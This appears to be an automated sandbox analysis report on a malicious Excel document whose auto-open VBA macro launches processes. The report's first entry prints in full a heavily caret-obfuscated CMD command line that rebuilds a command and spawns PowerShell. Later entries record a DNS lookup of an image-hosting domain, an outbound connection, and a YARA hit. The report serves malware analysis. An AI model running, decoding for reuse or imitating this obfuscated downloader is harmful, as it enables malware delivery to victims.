4095b316...48ab

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^\|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) ". ... VTI Actions Go to function call
Creates process "cmd.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\cmd.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\find.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\findstr.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". ... VTI Actions Go to function call
4/5	Process	Reads from memory of another process	-
"c:\windows\system32\cmd.exe" reads from "C:\Windows\system32\cmd.exe". ... VTI Actions Go to function call
3/5	Network	Performs DNS request	-
Resolves host name "images2.imgbox.com". ... VTI Actions Go to function call
3/5	Network	Connects to remote host	-
Outgoing TCP connection to host "66.254.122.104:443". ... VTI Actions Go to function call
3/5	YARA	YARA match	-
Rule "Document_Contains_Execution_Commands" from ruleset "Malicious-Documents" has matched for "C:\Users\aETAdzjz\Desktop\Doc061120182038778905.xls" ... VTI Actions Go to YARA match
2/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro automatically on target "workbook" and event "open". ... VTI Actions Go to macro
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
1/5	VBA Macro	Contains Office macro	-
Office document contains a VBA macro. ... VTI Actions Go to file details

Before

After